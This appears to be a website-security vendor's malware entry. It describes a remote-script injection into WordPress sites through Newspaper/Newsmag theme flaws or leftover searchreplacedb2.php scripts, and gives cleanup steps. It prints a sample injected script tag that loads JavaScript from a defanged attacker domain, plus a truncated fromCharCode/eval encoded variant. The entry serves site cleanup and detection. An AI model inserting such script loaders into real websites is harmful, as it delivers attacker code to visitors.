Description:
Injection of a remote script typically made either via vulnerabilities in Newspaper/Newsmag themes or via abandoned searchreplacedb2.php scripts.
Sample
<script type="text/javascript">var t = document.createElement("script"); t.type = "text/javascript" t.src = "hxxps://mp.trymynewspirit[.]com/s.js" document.head.appendChild(t);</script>
or an encoded version
eval(String.fromCharCode(118, 97, 114, 32, 115,...skipped... 59, 10))
Domain names change frequently.
Cleanup
In case of Newsmag/Newspaper infection, the malicious code should typically be removed from the "Ads" and "Custom Javascript" settings of the theme. Theme should be updated to prevent reinfections.
In case of the searchreplacedb2.php infection vector, the script should be removed from WordPress posts and from various options in the wp_options table. If you are using some database search and replace tool, make sure it correctly works with serialized data, otherwise it make break the site.
Affecting: As of 2017, mostly WordPress sites.
For more information read our blogpost